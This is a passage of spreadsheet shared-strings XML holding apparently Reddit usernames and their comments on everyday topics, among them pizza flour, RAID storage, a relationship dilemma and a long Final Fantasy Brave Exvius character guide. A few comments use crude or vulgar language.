    <t>My originality</t>
  </si>
  <si>
    <t>Brut4lC0ffee</t>
  </si>
  <si>
    <t>CREEPER</t>
  </si>
  <si>
    <t>Bibidiboo</t>
  </si>
  <si>
    <t>Alcohol is a pretty bad addiction for the wallet as well, but nothing tops cocaine.</t>
  </si>
  <si>
    <t>svenson_26</t>
  </si>
  <si>
    <t>I despise ranch. For pizza crust, chicken wings, or vegies dips, I would go for bleu cheese, dill, or garlic sauce. yumm</t>
  </si>
  <si>
    <t>mipzyyyy</t>
  </si>
  <si>
    <t>Thank you for the feedback! We will take a look at it on the next patch.</t>
  </si>
  <si>
    <t>lunarrust</t>
  </si>
  <si>
    <t>What has been some of the scarier, bad dreams you had as a child? Or even have now?</t>
  </si>
  <si>
    <t>NTHBK</t>
  </si>
  <si>
    <t>I see. I’m glad that you’ve overcome your emotions/senses &amp; tbh there is nothing to identify with. Nothing that the mind can make up to label us makes us who we are. One may be tall physically but that does not define their being. I believe you’ve had an ego death and are at the point of liberation from identifying with it.</t>
  </si>
  <si>
    <t>Vagina-Leg</t>
  </si>
  <si>
    <t>NTA: you are allowed to be uncomfortable about this and speak about this and even break up over this. But as you said yourself this is her decision to make, but that doesn't mean you can't speak about it honestly and maybe come to a compromise</t>
  </si>
  <si>
    <t>Philofelinist</t>
  </si>
  <si>
    <t>Ensure that you have a enough snacks. And bring some instant coffee or tea and instant soups just in case.</t>
  </si>
  <si>
    <t>Ignorant_Slut</t>
  </si>
  <si>
    <t>If I got drunk? Yes. I have full coverage, what else is it for other than to make sure you're covered for shit like that?</t>
  </si>
  <si>
    <t>jimmythemini</t>
  </si>
  <si>
    <t>All the happy and optimistic people immigrated to Brazil leaving a smaller pool of people predisposed to saudade.</t>
  </si>
  <si>
    <t>Ive gotta feelin the the "C" word may be involved</t>
  </si>
  <si>
    <t>cashmere_plum</t>
  </si>
  <si>
    <t>I fear this is where I am headed. Mailed some books several weeks ago and the tracking stops at “arriving late” and that was July 9th. I have tried to touch base with the buyer, but nothing and it still says it was never delivered. That’s the last time I do a drop in the box. Post office only from now on.</t>
  </si>
  <si>
    <t>megatricinerator</t>
  </si>
  <si>
    <t>summon graphic was bugged for me when I did one pull, guess what i got first time and didn't initially realize was the featured unit? guess gummy and RNGsus fealth bad after summoning a combined total of 30 times for the tokyo ghoul gates with no luck.</t>
  </si>
  <si>
    <t>Lara mfl 05</t>
  </si>
  <si>
    <t>lilachardy said: ↑ I just accidentally threw my computer at the floor. Seems to be okay... Click to expand... I hope it fares better than my last one. Seemed OK initially but then I found it had damaged the hinge on the lid. Gradually became worse every time I shut down the lid and started having 'the blue screen of doom' too many times, that I had to replace it in the end, Too many bare wires where the hinge had completely broken. To have replacement lid and screen and the labour involved was almost as much as a replacement. Sorry you've also got problems too gargs, gargs said: ↑ Woken up by the 'swallowed a bug' cough and now I'm awake. Cup of tea anyone? Click to expand... Posting at 4:36 gargs! I woke about that time but managed to sleep another hour. Have given up now though, so yes to that cuppa please. Morning all, when you surface.</t>
  </si>
  <si>
    <t>flooronthefour</t>
  </si>
  <si>
    <t>Well, we got the collision with the Andromeda Galaxy in about 4.5 billion years or so. So we got that going for us.</t>
  </si>
  <si>
    <t>jondavidbrooks</t>
  </si>
  <si>
    <t>Edelman has been great for the Patriots he just can't stay healthy for the Patriots. That's a reason to avoid.</t>
  </si>
  <si>
    <t>Potatopotatopotato01</t>
  </si>
  <si>
    <t>No. Why?</t>
  </si>
  <si>
    <t>Efurthy</t>
  </si>
  <si>
    <t>Yeah. Jon’s POV isn’t in feast and Sansa isn’t in Dance</t>
  </si>
  <si>
    <t>mrawsomemask</t>
  </si>
  <si>
    <t>I knew it!!! I did win the first 2 races. (Betting like you did) But then a 2nd ranked horse won. Then like a 5th ranked won. Then like a 3rd ranked won. But that's why they call it gambling! Thanks man!</t>
  </si>
  <si>
    <t>RayRomanoRealness</t>
  </si>
  <si>
    <t>Hi! I recently got into modding my Sims 2 game with SimPE and I downloaded the Simlogical Age Group Tweak mod. Everything was working perfectly until I got to the elder stage and it’s as if the counter starts over, it says my elder is “3 days old” when I hover over their lifespan bar rather than “63 days old” When changing the duration of life spans I only edited toddlers-adults, I didn’t do anything with the elders life span. Any ideas why this glitch is happening? Thanks in advance!</t>
  </si>
  <si>
    <t>MossBone</t>
  </si>
  <si>
    <t>I’m sure this isn’t funny to most people, but I was playing Minecraft with the boys and was working on something inside my house and when I finally walked outside, someone had built a giant “L” in front of my house.</t>
  </si>
  <si>
    <t>Tyrconnel</t>
  </si>
  <si>
    <t>It’s not like it’s only conservatives endorsing the idea of American exceptionalism. Obama and Hilary both referred to America as the greatest country in the world. This rhetoric is what convinced so many Americans that their military actions are somehow poorly executed acts of goodwill, when that is far from the truth.</t>
  </si>
  <si>
    <t>Llabesab1</t>
  </si>
  <si>
    <t>We need Xbox MLBTheShow, please I play a cartoon super mega baseball, it’s the only thing we have.</t>
  </si>
  <si>
    <t>Posts_yiff</t>
  </si>
  <si>
    <t>Can you say yee haw I want an authentic yee haw</t>
  </si>
  <si>
    <t>Jamie_1318</t>
  </si>
  <si>
    <t>I don't agree. I've been doing this for around a decade with no backups and just raid redundancy and accepting that if I ever lost it all I'd be okay. I haven't lost data since. I'll tell you what I have lost though, plenty of hard drives. raid let me continue operating my life normally with minimal issues while all my shit just works, no recoveries to deal with, just swap that disk in and let it replicate. The hassle of proper backups and extra operating overhead make it simply not worth it to me For starters backups require at least 50% capacity going to waste. With software raid I can essentially decide on an arbitrary overhead based on the rate disks die at. I don't have to spend time regularly plugging/unplugging drives if I'm using external disks, and I don't need to wait for syncing from the internet and all the costs that go along with that. If the media is truly important to you, go backup first, redundancy later. But if you need your media to just work and not bug you some form of RAID is the way to go.</t>
  </si>
  <si>
    <t>Kirmba128</t>
  </si>
  <si>
    <t>It happens to me post partum. I love it because I went the entire summer with my last kid not shaving. I can’t remember how long it lasted. Maybe a few months, but it was great.</t>
  </si>
  <si>
    <t>idklul3</t>
  </si>
  <si>
    <t>because rather than showing off or bragging about my rank I want to enjoy the game and as I climb the demographic gets better I just want to relax and play without 8 year olds flaming me because I didn't get in a hopeless 3v1 and die with him</t>
  </si>
  <si>
    <t>insertwittyusernamee</t>
  </si>
  <si>
    <t>There you go [https://imgur.com/a/F5nQNdu](https://imgur.com/a/F5nQNdu)</t>
  </si>
  <si>
    <t>jones1red</t>
  </si>
  <si>
    <t>Does a bear piss in the woods</t>
  </si>
  <si>
    <t>CardBoardPizzza</t>
  </si>
  <si>
    <t>Search on google images for “salt”</t>
  </si>
  <si>
    <t>yamask888</t>
  </si>
  <si>
    <t>Ew beast machines. Also fattimus prime on the left. Hurry for Transformers energon</t>
  </si>
  <si>
    <t>ChipAyten</t>
  </si>
  <si>
    <t>The only power comes from ownership, otherwise you're only just periodically striking for another crumb.</t>
  </si>
  <si>
    <t>BroadGeneral</t>
  </si>
  <si>
    <t>Get that man a fucking beer!</t>
  </si>
  <si>
    <t>jethrow41487</t>
  </si>
  <si>
    <t>Is that an Air58 with Foam instead of plastic on 3/4 of the Mouse? Wow. that looks terrible</t>
  </si>
  <si>
    <t>Radjage</t>
  </si>
  <si>
    <t>I use the parrot as well and think it's great. I use an old phone as the screen and while everyone isn't perfect at using it, for the price you really can't do better.</t>
  </si>
  <si>
    <t>CubeZapper</t>
  </si>
  <si>
    <t>This is so awesome, didn't know this was a thing</t>
  </si>
  <si>
    <t>orphan_clubber</t>
  </si>
  <si>
    <t>&gt; Bread lines aren't for the poor. Ah yes the communism understander has logged on</t>
  </si>
  <si>
    <t>Your post to /r/MinecraftBuddies was automatically removed as the title did not contain a valid platform tag. Feel free to make a new post that includes one of the following tags in the title: - [JAVA] - [BEDROCK] - [PS4] Bedrock includes the Xbox One, Mobile, Windows 10, and Nintendo Switch versions of the game. For more information visit [this wiki page](https://www.reddit.com/r/MinecraftBuddies/wiki/tags) or [contact the moderators](https://www.reddit.com/message/compose?to=%2Fr%2FMinecraftBuddies). *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/MinecraftBuddies) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>i_dont_factcheck</t>
  </si>
  <si>
    <t>Bit of a story, sorry. Backstory: My (21f) boyfriend (m20) and I have been together for 7 years. Throughout this time, I have been living with him at his parent’s house almost the whole time (I have an abusive, dysfunctional family life- this comes into play later. I was emotionally, physically and sexually abused a lot as a child/young teen. I had, and still have a really skewed view on what a healthy relationship should look like. I also have a handful of mental illnesses, ptsd and anxiety being the worst.). In this time, I have always felt less like a girlfriend and more like a housemate- example; he refuses to remember our anniversary, i do all of our cooking and cleaning, I have picked up skateboarding and video games and smoking pot to try and be more involved in his world but to no prevail, and he won’t even try anything I like (art, nature walks, cooking, swimming) He always has someone else to skate with, someone else to smoke with. We have been on one date in the past 7 years, and I planned it and paid. I stay with him because I genuinely care about him. He is pretty ok with handling my mental health which not really a lot of people can do, I don’t have anyone I would consider a friend in this state and I was recently let off, in a ridiculous amount of debt and don’t really have a second option. A few months ago, we had gone camping with a few of his friends/work mates on an island we had to take a ferry to get to. During that trip, bf’s new best friend had gotten obnoxiously drunk. He started making fun of his girlfriend’s weight, acting aggressive to every male on this trip (there were 10 of us, 3 females, between the ages of 16/17 - 24?), to the point where he had actually knocked a guy out for intervening what he thought was the start of a fight between bf’s friend and the youngest guy with us. We were all pretty intoxicated, but it basically ended with a bunch of people getting knocked out, the police being called and having to arrive in a helicopter, and the first panic attack I’ve had since I cut contact with my family. I told my partner that night that I did not want anything to do with his friends as his aggressiveness and constant drunkenness reminded me too much of my dad it made me anxious to be around. He was also a little misogynistic and majorly homophobic (I am a bisexual woman who is very proud and open in the lgbt+ community, so this hurt personally.) THE ISSUE: so shortly after this trip, and me clarifying I did not want anything to do with this guy, my wonderful bf decided to invite him over for drinks and a chop. 3 times a week. He would arrive at midday-ish and wouldn’t leave until after I’ve made dinner. I would usually stay in bed while he was here, or I would go out completely. I am pretty ok friends with his girlfriend but she has basically made it clear that her loyalties lie with her partner so if he wanted her to cut me off, she would. We have had 2 major fights since then, every time I have had to sit him down and explain to him that I really cannot have them in our house because it’s supposed to be my safe place too. Since this trip, I have woken up twice to this friend coming into our room to have a smoke with bf. He comes over multiple times a week no matter how many times I plead with my partner that if they want to hang out he can go by himself to their house. He refuses every time. I broke the day before yesterday when he asked if I wanted to stay at their house and get drunk with them. I told him he was selfish and always put his friends wants above me, and that’s truly how I feel. It’s my birthday in a week and it’s my dream to move to a different state a 5 hour flight away. My best friend lives in Melbourne and offered to buy my ticket and to stay with them for a month. Honestly, if I go I don’t know if I’d want to come back to a house I don’t feel comfortable in, so I want to give my boyfriend an ultimatum. Start going to couples counseling with me, and take my mental health and emotions into consideration because if not I am moving states and starting a new life. I’m sorry, this is a lot. I’m just going through a lot. Sorry.</t>
  </si>
  <si>
    <t>kingcole420</t>
  </si>
  <si>
    <t>Kingcole042</t>
  </si>
  <si>
    <t>CFW_Fight</t>
  </si>
  <si>
    <t>I have used vegito blue for teq, i have used gogeta for super agl, i have used int gogeta for int, i have used jiren for phy, i used super vegito for phy and added more just in case and still didn't receive the dragon balls, same with other variations of the stated categories</t>
  </si>
  <si>
    <t>cawmanuscript</t>
  </si>
  <si>
    <t>My point wasn't where you lived but that with your talent, you should get involved in the wider world of calligraphy and push you potential.</t>
  </si>
  <si>
    <t>Camdogg93</t>
  </si>
  <si>
    <t>"Do what you love and you'll never work a day in your life."</t>
  </si>
  <si>
    <t>SpideyRules9974</t>
  </si>
  <si>
    <t>Pee is stored in the balls???? Where the F did you take anatomy?!?!?</t>
  </si>
  <si>
    <t>Priamosish</t>
  </si>
  <si>
    <t>Eberwarze. With protagonist Harald Töpfer and Ronald Wiesel.</t>
  </si>
  <si>
    <t>interested21</t>
  </si>
  <si>
    <t>Doesn't it also have to be spread across x number of states? I hope her votes are!</t>
  </si>
  <si>
    <t>BrandonMarc</t>
  </si>
  <si>
    <t>Why Democrats’ 2020 Campaign Logos Aren’t Beating The MAGA Hat</t>
  </si>
  <si>
    <t>one or two ? wich one gets to be your little fuck toy</t>
  </si>
  <si>
    <t>johnbob1t1</t>
  </si>
  <si>
    <t>I have two ncvr if you still need, i can’t get on for a few hours tho</t>
  </si>
  <si>
    <t>EastBayRae</t>
  </si>
  <si>
    <t>This is the same country trying to be the happiest country in the world.</t>
  </si>
  <si>
    <t>dopnyc</t>
  </si>
  <si>
    <t>&gt; Why would anyone? Because, while 00 flour is the absolute best flour for traditional Neapolitan pizza, with a 7-8 minute bake, you're not making Neapolitan pizza. 00 pizza flour was/is made to do one job really well- 60-90 second Neapolitan pizza. The lack of malt and low-ish protein causes it to resist browning in intensely hot Neapolitan ovens. This is what the Neapolitans engineered it to do, and it performs this very limited role flawlessly. As you move into home oven temps, though, the lower protein and lack of malt that were tremendous assets at high heats now become defects. In an environment that already has issues producing fast bakes/fast browning, they delay browning even further, extending the bake time, sacrificing volume/puff, drying out the crust, making it hard and stale, as opposed to soft and puffy. Bread flour, on the other hand, was/is engineered for home oven temps. With it's higher protein and diastatic malt, it browns far faster than 00 and doesn't compromise volume or texture. This is why the American pizza industry, with it's typically cooler ovens, uses malted high protein flour. Neapolitan pizza is pretty much all oven. Just about every aspect builds off the 60 second bake- the flour, the hydration, the knead time, the salt, the choice of toppings, the topping quantities, the stretch, the proof, even the launch are all specially tailored for the 60 second bake. If you try to take all these perfectly tailored aspects and try to shoehorn them into a cooler oven, they fail. If you haven't made a huge number of pies, you might not notice the failure, and 00's shortcoming are textural, so you generally won't see them in a photo, but, trust me, they are there. If you want to invest in an oven that can make Neapolitan pizza, such as a Koda, then it's 00 all the way, but, until then, bread flour is your best choice for a home oven- by a wide margin.</t>
  </si>
  <si>
    <t>Res3925</t>
  </si>
  <si>
    <t>IDK about retire but he did have a serious injury when he was young. IIRC, he even had to learn to walk again.</t>
  </si>
  <si>
    <t>just_an_ordinary_guy</t>
  </si>
  <si>
    <t>You say feminist like it's a bad thing. I cut my teeth as a mechanic on a submarine. It's not a super friendly place. I can take a lot of shit and give it. But I've also learned to not be a massive piece of shit. You should give it a try.</t>
  </si>
  <si>
    <t>TheSecondSense</t>
  </si>
  <si>
    <t>Pretty sure that was a random one. The introduction ones and the ones that give you masks are all scripted. Pretty sure that’s a random one too because I didn’t see it, the one I saw the other day was the first random one I’ve seen with other 170 hours in game. Maybe they’re scripted to spawn in specific locations (like on the container and roof near the Washington Monument). Either way; I wish they were a bit more threatening, aren’t they meant to be HUNTERS? All an Agent has to do is look at them and they run away. When my HUD glitched an I know ones nearby, I don’t need to worry because I know I’m safe, i don’t want to be safe, I want to be scared and worried, knowing that it’s an unfair fight and that they can use my own tech against me.</t>
  </si>
  <si>
    <t>bonanza301</t>
  </si>
  <si>
    <t>I work in the St. Paul area in Minnesota</t>
  </si>
  <si>
    <t>DerpageOnline</t>
  </si>
  <si>
    <t>Since you like to quote u/amd_Robert: How many times has your Zen 2 boosted 200 Mhz beyond it's spec sheet?</t>
  </si>
  <si>
    <t>marioman63</t>
  </si>
  <si>
    <t>nice google translate. gold sticker for trying anyways</t>
  </si>
  <si>
    <t>Slimslim05</t>
  </si>
  <si>
    <t>So we are currently sitting in a Methodist Lebonheur Urgent Care and it got me wondering. Restaurants and fast food places alike have inspections to check for cleanness and what not , but what about health car facilities ? I would imagine it would be equally important if not more important for those places to be clean, but who checks them ?</t>
  </si>
  <si>
    <t>Emilio_Okami</t>
  </si>
  <si>
    <t>Interesting metaphor hehe. I really like the way you've done this comic to look, it is very awesome. Keep up the good work! :3</t>
  </si>
  <si>
    <t>TxCoastal</t>
  </si>
  <si>
    <t>sounds like he may not have a grasp on the 'human' concept of time management. Have been in theatres doing 10 shows a year.. do 4 -5 weeks of MTW 7-10p &amp; Sat morn..9-12. tech week is of course every night, from Mon on to opening.... but as a producer/director, you have GOT to be kind to actors. it's NOT a demonstration of how much of a slave driver a director can be. If that is the case..... I simply would not work with them again. most people don't need that kind of added stress to their lives. House we are at now does 6 shows/year. same type of rehearsal setup.. except we go from 6-9. and call it quits at 9 no matter what is happening.</t>
  </si>
  <si>
    <t>Argvicto</t>
  </si>
  <si>
    <t>Alexa play hit the abortion clinic intrude</t>
  </si>
  <si>
    <t>XXcstatic</t>
  </si>
  <si>
    <t>@ineedaholidaynow I'm not saying that it was wrong to be concerned about the father or the son. But calling 999 for a completely unharmed 15 year old who is safe in a tent is insane. No wonder the emergency services struggle to get to genuine emergencies. I have lived in a lot of countries and I have never come across anywhere like the UK in its determination to deprive teenagers of any independence or autonomy. Then YP get to their 20s and are derided as snowflakes when, in fact, they have not been allowed to develop any coping skills in their teens.</t>
  </si>
  <si>
    <t>chaos-black</t>
  </si>
  <si>
    <t>For me it is sulfur. I have spent the last year training for and passing the bjcp exam and realized I am really sensitive to sulfur. I hate the fart in a glass regardless of style. The good thing though is that I can assure you that it is not as common in German lagers as some of the literature would have you believe. I am a German and have rarely come across this aroma in domestic lagers.</t>
  </si>
  <si>
    <t>Showtime98</t>
  </si>
  <si>
    <t>Obvious answer is Nylander but Rielly and Andersen are man rockets as well.</t>
  </si>
  <si>
    <t>fennec fox</t>
  </si>
  <si>
    <t>follow the members " journey " thread you will know new things.</t>
  </si>
  <si>
    <t>CalamityBowser</t>
  </si>
  <si>
    <t>I’m sorry if I came off like I was challenging your opinion. That wasn’t my intention at all. I was just trying to say exactly what you just said haha. You said it much more eloquently. Anticlimactic is a great way to describe it, but I’m happy it didn’t take away any of your enjoyment. Good luck on the second playthrough! I hope it fixes the ending for you.</t>
  </si>
  <si>
    <t>TheMace808</t>
  </si>
  <si>
    <t>I have no man's sky, Minecraft, Brawlhalla, Destiny 1 and 2, Black ops 3, Apex legends, Crossout and Warframe, just looking for some friends to play with!</t>
  </si>
  <si>
    <t>rumham_irl</t>
  </si>
  <si>
    <t>Yesterday, because I’m lucky enough to have them both alive and in contact with me despite the shit I’ve put them through. I tell them every time we talk.</t>
  </si>
  <si>
    <t>Soulweaver89</t>
  </si>
  <si>
    <t>Hello and welcome to the 41st GOATS! Today I finally get to look at a unit I've had at the back of my mind for a while. The unit is Blossom Sage Sakura - with both her Latent Abilities and Ability Awakenings coming at the same time, it's like all her birthdays have come at once! *All 700 of them*. Anyway, she got substantial boosts from these, and I feel like she's definitely more than a weak finisher now. # Introduction So as I mentioned in the intro, Sakura is mostly a magic based finisher, strongly favoring the lightning element. &gt;!As the former Veritas of the Bolt!&lt;, you'd really hope she favors the lightning element. # Stats and Trust Rewards Being an older (lore-wise and game-wise) unit, her stats are unfortunately not as great as they could be. For some reason her pots favor HP instead of MAG, so she's basically just leaving 15 (+7) free MAG on the table here. That being said, HP is never a bad thing. After her passives (including latent and awakened abilities), she totals 40% HP, 70% MP, 80% MAG (with another 100% for equipping a Rod) and 30% SPR. Additionally, she gets an impressive 100% mTDH *and* mTDW, allowing you to build her either way depending on what TMRs you have. She's passively immune to sleep, silence, paralysis, confusion and petrification - every single relevant status ailment. She also has 50% innate lightning resistance. Every turn, she recovers 10% of her max MP, and has a 500 + 6x healing mod auto-regen. Since healing mods do scale with MAG (although less than SPR), she will get some value out of this. She does also get some LB support, with a bonus 50% fill rate, 5 LB crystals a turn, and 50% increased damage. Sakura also has a couple of counterattacks, and an innate 30% boost to their proc chance. \- 20% of the time (before buff, so 26% after) she counters magic with Shocking Revenge (3 turn, 100% single target lightning imperil). \- 20% (26%) of the time against either physical or magical (but capped at one each) attacks, she retaliates with Energy Change, which is a flat 30 MP restore to all allies. Small, but it's in the counter phase, so there's no more chance of a boss draining it. Finally, we arrive at her trust rewards. Her TMR is Sage of Mysidia, a materia that grants 20% MP, 40% MAG and 2 LB/turn. It's pretty decent - while 50% is the standard for strong MAG TMRs, the added benefit of 2 LB/turn isn't bad. Her STMR is her robe. It geants 14 DEF, 77 MAG, 42 SPR, 50% Lightning Resist and 1 LB/turn. As far as pure MAG goes, this is the single best Robe in the game. The lightning resist is also the single highest in the chest slot. The LB fill is a bonus. While you could argue that Dark Fina's STMR is situationally better (slightly less MAG but more SPR, a fat chunk of MP and some relevant stat immunities, but locked to girls), Sakura's Robe is still a fantastic piece of gear and will most likely be your BiS. TMR or STMR? STMR all the way. Her TMR is good, but there's better. Not so much for her STMR - especially if whoever's wearing it is immune to paralysis and silence. # Abilities Sakura has a couple of categories of abilities - damage and support. The support abilities are now dualcastable with Quick Support Combo, and they also include some cooldowns: \- Electric Infusion is a single target lightning imbue. The fact that it's now dualcastable is a huge deal, meaning she doesn't just forfeit one turn to imbue a single unit. \- Defensive Barrier is a 4-turn 30% damage mitigation. It's a handy one, and while 30% is the standard these days, 4 turns is above average. \- Status Reset grants allies 5 turns of full status immunity, which is also a big deal. A lot of trials imperil ailments these days, and this is the buff that will counteract them. \- Thunder's Protection is 3 turns of 50% resistance to Lightning, Light and Dark. Three elements at once isn't the worst thing, but 50% is a bit low. \- Thunder's Fortification is 3 turns of AoE 100% lightning resistance. This is more like it. A great buff, especially on a dualcast. \- Ephemeral Blossom Hex is a cooldown move on an 8 turn cooldown, available from turn 1. It restores 12000 HP and 120 MP to all allies except Sakura and fills their LB gauge by 10. It also buffs ATK/DEF/MAG/SPR by 150% for 3 turns, but hits Sakura for 30% HP damage. It also costs her entire LB bar, which is somewhat of a drawback. Fantastic support move if you're not using her LB though. \- Celestial Roar is another cooldown, available from turn 1 on a 5 turn cooldown. It cures MAG breaks to Sakura, buffs her lightning resist by 100% for 2 turns, imperils all enemies' lightning resist by 110% for 3 turns, and unlocks 2 turns (so you only get one use) of her pentacast. It only works for some of her damaging abilities though. Next are her damaging moves. With her enhancements she has permanent Triplecast, and she can unlock a pentacast for some of her abilities. First, the moves that can be pentacast: \- Quick Thunder's Light is an AoE 3.8x lightning damage magic attack that also imperils lightning by 50%. Pretty weak. \- Quick Shock Blade is a single target attack that deals 8.7x damage, imperils lightning by 80% for 3 turns, and chains with Bolting Strike. So she can actually be called Bolting Strike Sakura!^(Yaay) \- Quick Final Thunder is a rather immense stacking move, starting at 5.5x, and ramping up to 26.5x after 6 casts. Not that that's a lot with her pentacast. Now it is a slow cast, so if you want Sakura to cap her own chains, you'll need to cast it *before* you cast her chaining move. That's it for the pentacast - the rest are limited to triplecast only, unfortunately. \- Quick Bright Flash is an AoE 2.3x Light attack that reduces enemy Light resistance by 50%. Even weaker than the thunder version. \- Quick Blighted Gloom is the Dark equivalent of Quick Bright Flash. \- Quick Light Blade is a 7.2x single target light element attack that decreases the target's light resistance by 80% and chains with Disorder. \- Quick Dark Blade is the dark equivalent of Quick Light Blade, except it chains with Absolute Zero. \- Quick Offensive buffs all allies' ATK by 100% for 3 turns. \- Quick Magic buffs all allies' MAG by 100% for 3 turns. \- Quick Refresh restores 90 MP over 3 turns to all allies. \- Finally, Quick Rebel Intention rounds out her default kit as an effective 18.6x non-elemental AoE magic nuke. It's not quite as powerful as a fully stacked QFT, but if you can't use lightning element, it's a good finisher for a chain. \- And last but definitely not least is her Latent active ability, Blossoming Thunder. It's a cooldown move available from turn 2 with a 2 turn cooldown, and is a 16x single target lightning damage attack with a 3 turn, 100% lightning imperil attached. It also chains with Graviton Cannon. This is pretty strong as far as chaining moves go, but you can only use it every other turn and only once each time. Sakura's LB is simply 18x damage to all enemies - 27x after her innate boosts. It hits a massive 40 times, meaning if you have multiples you can fit practically anything into that chain. # Gearing Sakura has an interesting selection of weapons available, to say the least - daggers, staves, rods, axes, spears and maces. She will only really ever want to use rods, since none of the rest do anything much for her MAG. Defensively she's a lot more limited, only having access to hats, clothes and robes. &gt;!Guess it's been too long since she wore the armor, and has forgotten how to.!&lt; Here's a sample [build](https://ffbeEquip.com/builder.html?server=GL#8f6c2e90-b0bd-11e9-a1b8-7b53378612e4) for her. If you don't have access to many 5\* TMRs, you could try [this](https://ffbeEquip.com/builder.html?server=GL#b557abc0-b0bd-11e9-a1b8-7b53378612e4). It comfortably clears the parameter mission, if you needed it. Yes, it does use the reward, but it won't be the make-or-break as you could just as easily use a Dark Robe. If you have a everything, try this [ridiculous build](https://ffbeEquip.com/builder.html?server=GL#eed5fe60-b0bd-11e9-a1b8-7b53378612e4). Over 3k MAG, with another 100 available once you door her MAG stat. # Bonus Section So, the new big boss on the block is the Chaotic Darkness from the SBB. [I'm not the first one to have the idea](https://www.reddit.com/r/FFBraveExvius/comments/cihtkc/enhanced_granny_sakura_vs_sbb_boss_chaotic/) of using Sakura here. Anyway, let's do a turn count using a mega whale build. \- [This is the build](https://ffbeEquip.com/builder.html?server=GL#f30d7e00-b0f3-11e9-a1b8-7b53378612e4). The 170% buff is 20% from her latent abilities (which don't appear to be on FFBEEquip yet), and 150% from her own buff. \- Working with her own imperil of 110%. \- Fully stacked (6 stacks) QFT So a single Sakura suceeds in doing 3,920,244 damage to the boss with a single cast. What if we have two of them? Even better, what if they chain and top their chains with QFT? So, assuming you have two megawhale Sakuras and are using the rotation of QFT &gt; QSB &gt; QFT &gt; QSB &gt; QSB - this rotation will ensure that the QFTs cap a chain. I don't believe it's possible to cap more than two. I'm also assuming that after a QFT connects, the chain breaks and starts over again. Damage for a single Quick Shock Blade comes in at 1,287,023. Average chain multiplier for the first Bolting Strike family is 3x, while everything after that would be 4x. Quick calculations (hah) put the damage for this rotation at 88,464,364. If you just triplecast the last three of the rotation, you end up with 49,380,274. Assuming you take the first two turns to charge up your QFT and then turn on pentacast - and that you keep some manner of debuffs up (for instance, replacing one QSB with a Blossoming Thunder every 2nd turn) - you're looking at 5-6 turns to smack the shit out of this monstrosity. That's not counting a more optimized rotation or help from any other units. That build even comes with 80% dark resist! It's perfect! # Teambuilding Obviously, the best partner for Sakura would be another Sakura. They share rotations, etc, but that's basically every single damage unit with any semblance of chaining. Sakura pairs *extremely* nicely with Randi, who shares permanent triplecast uptime, as well as three chaining families and their corresponding elements. It's almost as if they planned it... She also pairs well with Sylvie - but then again, so does everyone ever. Sylvie can imbue Light and Lightning, and bestow Bolting Strike frames. She also has physical and magical mitigation shields that go nicely with Sakura's general mitigation shield. Sakura also has a few ways to imperil those two elements (but she's better at lightning). Beryl is a nice buddy for Sakura as well - he chains with Bolting Strike and Disorder, can break (something Sakura can't), and can be a tank who has the potential to chain with Sakura, even keeping up with triplecast. He also makes use of her lightning imbue - his Disorder move is naturally light element. # Pros \- Huge modifiers with pentacast \- Strong support kit with multicast. # Cons \- Strong burst damage is locked to lightning element \- Relatively low base MAG stat # Conclusion Sakura got some really impressive boosts. I find myself again regretting that I did the logical thing and used all my EP on Nichol and left both Fina and Sakura to wait for a while... That's not the point though. Point is now that she has massive damage, and can chain with the top dogs, while offering great utility, she's now a great candidate for your team. Bring her some candy and she'll certainly fry the next boss you need to kill. # Archive Now in tabular form to save on vertical space! |[Pilot: Rem](https://www.reddit.com/r/FFBraveExvius/comments/9prxvp/bootcamp_soulweavers_horribly_inefficient_tactics/)|[GOATS 2: Illusionist Nichol](https://www.reddit.com/r/FFBraveExvius/comments/9rrydj/great_odd_and_alternate_tactics_showcase/)|[GOATS 3/4: Meliadoul / Soleil](https://www.reddit.com/r/FFBraveExvius/comments/9vqrsd/great_odd_and_alternate_tactics_showcase_budget/)| |:-|:-|:-| |[GOATS 5: Tidus](https://www.reddit.com/r/FFBraveExvius/comments/9xqdrx/great_odd_and_alternate_tactics_showcase_tidus/)|[GOATS 6: Rinoa](https://www.reddit.com/r/FFBraveExvius/comments/9zwv4u/great_odd_and_alternate_tactics_showcase_rinoa/)|[GOATS 7: Gladio](https://www.reddit.com/r/FFBraveExvius/comments/a20v4h/great_odd_and_alternate_tactics_showcase_gladio/)| |[GOATS 8: Beryl](https://www.reddit.com/r/FFBraveExvius/comments/a4833e/great_odd_and_alternate_tactics_showcase_beryl/)|[GOATS 9: Dracu Lasswell](https://www.reddit.com/r/FFBraveExvius/comments/a61qrf/great_odd_and_alternate_tactics_showcase_dracu/)|[GOATS 10: Roy](https://www.reddit.com/r/FFBraveExvius/comments/a8in65/great_odd_and_alternate_tactics_showcase_roy/)| |[GOATS 11: Christine](https://www.reddit.com/r/FFBraveExvius/comments/aaiolo/great_odd_and_alternate_tactics_showcase_christine/)|[GOATS 12: Kunshira](https://www.reddit.com/r/FFBraveExvius/comments/acrhel/great_odd_and_alternate_tactics_showcase_kunshira/)|[GOATS 13: Duke](https://www.reddit.com/r/FFBraveExvius/comments/af4s9i/great_odd_and_alternate_tactics_showcase_duke/)| |[GOATS 14: Olive](https://www.reddit.com/r/FFBraveExvius/comments/ahjlcv/great_odd_and_alternate_tactics_showcase_olive/)|[GOATS 15: Dark Fina](https://www.reddit.com/r/FFBraveExvius/comments/ajyilh/great_odd_and_alternate_tactics_showcase_dark_fina/)|[GOATS 16: Yan](https://www.reddit.com/r/FFBraveExvius/comments/amcazx/great_odd_and_alternate_tactics_showcase_yan/)| |[GOATS 17: Lulu](https://www.reddit.com/r/FFBraveExvius/comments/aopkh4/great_odd_and_alternate_tactics_showcase_lulu/)|[GOATS 18: Marie](https://www.reddit.com/r/FFBraveExvius/comments/ar6mko/great_odd_and_alternate_tactics_showcase_marie/)|[GOATS 19: Lilith](https://www.reddit.com/r/FFBraveExvius/comments/atzyj9/great_odd_and_alternate_tactics_showcase_lilith/)| |[GOATS 20: Citra](https://www.reddit.com/r/FFBraveExvius/comments/awf28a/great_odd_and_alternate_tactics_showcase_citra/)|[GOATS 21: Jiraiya](https://www.reddit.com/r/FFBraveExvius/comments/az9t6w/great_odd_and_alternate_tactics_showcase_jiraiya/)|[GOATS 22: Myra](https://www.reddit.com/r/FFBraveExvius/comments/b1lu49/great_odd_and_alternate_tactics_showcase_myra/)| |[GOATS 23: Karlette](https://www.reddit.com/r/FFBraveExvius/comments/b4f6jw/great_odd_and_alternate_tactics_showcase_karlette/)|[GOATS 24: Livid 